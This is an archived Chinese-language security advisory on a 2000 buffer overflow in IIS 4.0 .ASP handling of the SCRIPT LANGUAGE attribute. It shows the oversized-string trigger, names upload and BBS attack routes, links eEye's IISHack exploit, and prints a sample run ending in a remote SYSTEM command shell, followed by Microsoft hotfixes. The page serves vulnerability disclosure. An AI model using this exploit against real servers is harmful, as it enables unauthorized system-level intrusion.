首页 -> 安全研究
安全研究
安全漏洞
IIS .ASP扩展"LANGUAGE"溢出漏洞
发布日期:2000-11-06
更新日期:2000-11-06
受影响系统:
不受影响系统:
Microsoft IIS 4.0 sp6
- Microsoft Windows NT 4.0
描述:
Microsoft IIS 5.0
- Microsoft Windows 2000
Microsoft IIS 4.0的.ASP ISAPI文件扩展处理机制中存在一个缓冲区溢出漏洞
,可能被用来获取SYSTEM级别的访问权限。
溢出发生在对Java Script中"LANGUAGE"变量的处理中,如果提供一个很长的字
符串给"LANGUAGE"变量,将导致IIS(inetinfo.exe)发生溢出。下面是一个
例子.asp文件:
...
<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">
</SCRIPT>
..
如果[buffer]包含2220个或者更多的字符,将导致溢出发生。
这可能使攻击者获取SYSTEM级别的权限。
这个漏洞是一个本地漏洞,需要攻击者提供一个恶意的asp文件来发动攻击。然
而,只要攻击者可以上传asp文件,也可以从远程发起攻击。例如:
1. 对于提供虚拟主机或者asp上传的站点。攻击者只需上传一个恶意的asp文件。
就可以远程获取SYSTEM权限。
2. 某些留言板或者BBS程序允许用户输入Java Script脚本。攻击者就可以在留
言中输入包含恶意代码的Java Script语句,远程入侵系统。
3. 利用IIS unicode漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并
发动溢出攻击。
<*来源:eEye Digital Security (info@eEye.com)
URL: http://www.eEye.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
eEye.com提供了一份测试代码:
http://www.eEye.com/html/advisories/IISHack1.5.zip
测试实例:
C:\we are still hiring good programmers> iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80
6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
建议:
厂商补丁:
微软已经在一些hot fixes中修复了此问题,最新的W3SVC.DLL也已经修复了这个漏洞。
安装了下列任意一个hotfix都可以修复此漏洞:
MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability
MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability
MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability
微软安全公告地址:
http://www.microsoft.com/technet/security/current.asp
浏览次数:6133
严重程度:0(网友投票)
绿盟科技给您安全的保障